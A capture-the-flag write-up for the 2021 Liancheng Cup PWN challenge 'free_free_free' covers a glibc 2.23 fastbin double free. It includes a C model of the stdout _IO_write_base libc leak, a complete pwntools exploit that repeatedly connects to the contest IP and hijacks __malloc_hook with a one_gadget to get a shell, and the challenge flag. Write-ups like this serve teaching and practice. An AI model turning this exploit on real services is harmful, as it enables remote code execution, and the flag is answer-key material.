Cybersecurity | 2021 Liancheng Cup (莲城杯) Cybersecurity Competition - PWN - free_free_free
Challenge name: free_free_free
Challenge description: You must be very good at free. Target: nc 183.129.189.60 10023
Points: 300.0
Difficulty: Medium
Attachment: free_free_free的附件.zip
Solution:
1. Protections. The local libc is the same as the remote one, so there is no need to load the one shipped in the attachment.
(checksec screenshot in the original post)
2. Vulnerability: double free. The chunk pointer is not cleared after free, so the same index can be freed again.
(screenshot in the original post)
3. The fastbin attack needs a partial overwrite that guesses one ASLR nibble of the stdout address, so each attempt has a 1/16 chance. Both stdout-0x43 and __malloc_hook-0x23 contain a 0x7f byte that serves as a fake fastbin size (chunksize() masks the low 3 bits, so 0x7f passes the check for a 0x70 chunk). The first fastbin attack lands a chunk over stdout and leaks libc by lowering _IO_write_base; the second lands a chunk over __malloc_hook, where realloc+16 goes into __malloc_hook and a one_gadget into __realloc_hook so the stack is shifted enough for the gadget's constraints. The exp below retries the connection in a loop until the guess is right (if you strip the loop, run it several times).
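To make step 3 concrete, here is an added example (written for this page; it is neither the original exp nor glibc code) that models the stdout leak on glibc 2.23 x86_64: it lays out the _IO_FILE fields at their real offsets (checked with _Static_assert), places a fake stdout at an address ending in 0x20 as _IO_2_1_stdout_ does in that libc, applies the same 0x68-byte write the exp makes into the fake chunk at stdout-0x43, and runs a simplified stand-in for the overflow/_IO_do_write flush path. It also shows why a 0x7f byte is accepted as a fastbin size. Everything in it is constructed: the buffer standing in for libc's data, the pointer value planted before stdout, and the flag constants copied from libio.h.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Flag bits from glibc's libio.h that the flush path tests. */
#define IO_NO_WRITES          0x0008
#define IO_CURRENTLY_PUTTING  0x0800
#define IO_IS_APPENDING       0x1000

/* Field layout of struct _IO_FILE, glibc 2.23, x86_64 (offsets verified below). */
struct model_io_file {
    int32_t _flags; int32_t _pad0;
    char *_IO_read_ptr, *_IO_read_end, *_IO_read_base;
    char *_IO_write_base, *_IO_write_ptr, *_IO_write_end;
    char *_IO_buf_base, *_IO_buf_end;
    char *_IO_save_base, *_IO_backup_base, *_IO_save_end;
    void *_markers;
    struct model_io_file *_chain;
    int32_t _fileno, _flags2;
    int64_t _old_offset;
    uint16_t _cur_column; int8_t _vtable_offset; char _shortbuf[1];
    void *_lock;
};
_Static_assert(offsetof(struct model_io_file, _IO_write_base) == 0x20, "write_base");
_Static_assert(offsetof(struct model_io_file, _chain) == 0x68, "chain");
_Static_assert(offsetof(struct model_io_file, _shortbuf) == 0x83, "shortbuf");

/* Constructed stand-in for libc's data segment. stdout is placed at an address
 * ending in 0x20, like _IO_2_1_stdout_ (0x...620) in the target libc, because
 * the single-byte overwrite of _IO_write_base relies on that low byte. */
static _Alignas(0x100) unsigned char g_libc_data[0x200];
#define MODEL_STDIN  ((struct model_io_file *)(g_libc_data + 0x020))
#define MODEL_STDOUT ((struct model_io_file *)(g_libc_data + 0x120))

static void model_init(void) {
    memset(g_libc_data, 0, sizeof g_libc_data);
    struct model_io_file *out = MODEL_STDOUT;
    out->_flags = (int32_t)0xfbad2887u;          /* what an unbuffered stdout typically shows */
    out->_IO_read_ptr = out->_IO_read_end = out->_IO_read_base = out->_shortbuf;
    out->_IO_write_base = out->_IO_write_ptr = out->_IO_write_end = out->_shortbuf;
    out->_IO_buf_base = out->_shortbuf; out->_IO_buf_end = out->_shortbuf + 1;
    out->_chain = MODEL_STDIN;                   /* the value that ends up leaked */
    out->_fileno = 1;
    /* The 0x7f "size" is the top byte of a libc pointer stored in the struct
     * that precedes stdout (a constructed value here, at stdout-0x40). */
    uint64_t ptr_before_stdout = 0x00007f1234567890ULL;
    memcpy((unsigned char *)out - 0x40, &ptr_before_stdout, 8);
}

/* Size field of the fake chunk at stdout-0x43, i.e. the qword at stdout-0x3b. */
static uint64_t fake_chunk_size_field(void) {
    model_init();
    uint64_t sz; memcpy(&sz, (unsigned char *)MODEL_STDOUT - 0x3b, 8);
    return sz;
}

/* glibc's fastbin check: chunksize() masks the low 3 bits, so 0x7f passes as a
 * 0x70 chunk, the size class both malloc(0x60) and malloc(0x68) map to. */
static unsigned fastbin_index(uint64_t chunk_size) { return (unsigned)((chunk_size >> 4) - 2); }
static int fake_size_accepted(uint64_t size_field, size_t request) {
    size_t want = (request + 8 + 15) & ~(size_t)15;   /* request2size() */
    if (want < 0x20) want = 0x20;
    return fastbin_index(size_field & ~(uint64_t)7) == fastbin_index(want);
}

/* The 0x68-byte write the exp makes into the fake chunk (user data starts at
 * stdout-0x33): 0x33 zeros, new flags, three zeroed read pointers, then one
 * byte 0x88 into the low byte of _IO_write_base (stdout+0x83 -> stdout+0x68). */
static void model_apply_payload(struct model_io_file *out, uint64_t flags) {
    unsigned char payload[0x33 + 8 + 3 * 8 + 1] = {0};
    memcpy(payload + 0x33, &flags, 8);
    payload[sizeof payload - 1] = 0x88;
    memcpy((unsigned char *)out - 0x33, payload, sizeof payload);
}

/* Simplified stand-in for _IO_new_file_overflow -> _IO_do_write: with
 * _IO_CURRENTLY_PUTTING set the write pointers are trusted as they are, and
 * _IO_IS_APPENDING skips the lseek() that fails on a socket. */
static size_t model_flush(struct model_io_file *f, unsigned char *sink, size_t cap) {
    if (f->_flags & IO_NO_WRITES) return 0;
    if (!(f->_flags & IO_CURRENTLY_PUTTING))
        f->_IO_write_base = f->_IO_write_ptr = f->_IO_read_ptr;   /* reset would undo the attack */
    if (!(f->_flags & IO_IS_APPENDING) && f->_IO_read_end != f->_IO_write_base)
        return 0;                                               /* lseek(ESPIPE) path: nothing sent */
    size_t n = (size_t)(f->_IO_write_ptr - f->_IO_write_base);
    if (n > cap) n = cap;
    memcpy(sink, f->_IO_write_base, n);
    return n;
}

/* Run the sequence with the given _flags value; returns the number of bytes
 * "sent" and their first qword, which is &_IO_2_1_stdin_ (what r7f() reads). */
static size_t model_leak(uint64_t flags, uint64_t *first_qword) {
    model_init();
    model_apply_payload(MODEL_STDOUT, flags);
    unsigned char sink[64];
    size_t n = model_flush(MODEL_STDOUT, sink, sizeof sink);
    *first_qword = 0;
    if (n >= 8) memcpy(first_qword, sink, 8);
    return n;
}

int main(void) {
    uint64_t leaked;
    printf("fake size 0x%llx accepted for malloc(0x60): %d\n",
           (unsigned long long)fake_chunk_size_field(), fake_size_accepted(0x7f, 0x60));
    size_t n = model_leak(0xfbad3887ULL, &leaked);
    printf("flush sent %zu bytes, first qword 0x%llx, &stdin %p\n",
           n, (unsigned long long)leaked, (void *)MODEL_STDIN);
    return 0;
}
```

Build with `gcc -std=c11 -Wall stdout_leak_model.c` (file name assumed). The model reproduces the two things the exp depends on: the flush window [stdout+0x68, stdout+0x83) is 0x1b bytes long and begins with _chain, and without _IO_IS_APPENDING (flags left at 0xfbad2887) the same write sends nothing, because the zeroed _IO_read_end no longer matches _IO_write_base and the real code would try an lseek() that fails on a socket.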
```python
#!/usr/bin/env python
# Python 2 / pwntools exploit. The target libc is glibc 2.23 (no tcache), so the
# fastbin double free goes through and __malloc_hook can be hijacked.
from pwn import *

local = 0
debug = 0
binary = "./free_free_free"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
elf = ELF(binary)
context.log_level = "debug" if debug else "info"

if local:
    # p = process(binary)
    libc = ELF(lib)
else:
    # p = remote("183.129.189.60", "10023")
    # lib = "./libc.so.6"
    libc = ELF(lib)

s = lambda buf: p.send(buf)
sl = lambda buf: p.sendline(buf)
sa = lambda delim, buf: p.sendafter(delim, buf)
sal = lambda delim, buf: p.sendlineafter(delim, buf)
sh = lambda: p.interactive()
r = lambda n=None: p.recv(n)
ru = lambda delim: p.recvuntil(delim)
# first 6-byte pointer ending in 0x7f in the output, zero-extended to 8 bytes
r7f = lambda: u64(p.recvuntil("\x7f")[-6:] + "\x00\x00")
trs = lambda addr: libc.address + addr
gadget = lambda ins: libc.search(asm(ins, arch="amd64")).next()
tohex = lambda buf: "".join("\\x%02x" % ord(_) for _ in buf)

def add(size, content):
    sal("> ", "1")
    sal("size> ", str(size))
    sa("message> ", content)

def free(id):
    sal("> ", "2")
    sal("idx> ", str(id))

def pwn():
    # idx 0: 0x90 chunk, too big for the fastbins, so free() puts it in the unsorted bin
    add(0x78 + 1, "0" * 8)
    add(0x60, "1" * 8)          # idx 1: 0x70 fast chunk
    add(0x60, "2" * 8)          # idx 2: 0x70 fast chunk
    free(0)                     # fd/bk of chunk 0 now hold a main_arena pointer
    add(0x18, "3" * 8)          # idx 3: split off chunk 0; the 0x70 remainder stays in the unsorted bin
    # idx 4: the remainder; its stale fd is a libc pointer, so a 2-byte partial
    # overwrite points it at stdout-0x43 (the 0x6 nibble is the ASLR guess, 1/16)
    add(0x60, "\xdd\x65")
    free(2)
    free(1)
    free(2)                     # double free: fastbin 2 -> 1 -> 2
    # overwrite the low byte of chunk 2's fd so it points at chunk 4's header
    # (size 0x70, fd = stdout-0x43): fastbin 1 -> 2 -> chunk 4 -> stdout-0x43
    add(0x60, chr(0x20))
    add(0x60, "tmp")
    add(0x60, "tmp")
    # raw_input()
    add(0x60, "tmp")
    # the next 0x70 allocation is the fake chunk at stdout-0x43; its user data
    # begins at stdout-0x33, so 0x33 zeros reach _flags
    payload = ""
    payload += chr(0) * 0x33
    payload += p64(0xfbad3887)      # _flags with _IO_IS_APPENDING set
    payload += p64(0) * 3           # _IO_read_ptr / _IO_read_end / _IO_read_base
    payload += "\x88"               # low byte of _IO_write_base -> stdout+0x68 (_chain)
    add(0x68, payload)
    # the next flush sends [_IO_write_base, _IO_write_ptr), which starts with _chain = &_IO_2_1_stdin_
    libc.address = r7f() - libc.sym["_IO_2_1_stdin_"]
    info("libc base => 0x%x" % libc.address)
    ogg = [trs(_) for _ in (0x45226, 0x4527a, 0xf03a4, 0xf1247)]   # one_gadget offsets for this libc
    og = ogg[1]
    # second fastbin attack, now on __malloc_hook-0x23 (also carries a 0x7f byte)
    free(2)
    free(1)
    free(2)
    add(0x60, p64(libc.sym["__malloc_hook"] - 0x23))
    add(0x60, "tmp")
    add(0x60, "tmp")
    # user data sits at __malloc_hook-0x13: offset 0xb is __realloc_hook, 0x13 is __malloc_hook
    payload = ""
    payload += chr(0) * (0x13 - 8)
    payload += p64(og)                          # __realloc_hook -> one_gadget
    payload += p64(libc.sym["realloc"] + 16)    # __malloc_hook -> realloc+16, shifts the stack for the gadget
    add(0x68, payload)
    # any malloc() now runs realloc+16 -> __realloc_hook -> one_gadget
    sl("1")
    sl("17")

# retry until the 1/16 guess on the stdout address is right
while True:
    try:
        # p = process(binary)
        p = remote("183.129.189.60", "10023")
        pwn()
        break
    except:
        p.close()
raw_input("[*] get shell")
sh()
# DASCTF{7a95efe41004077a790d234f5b90c343}
```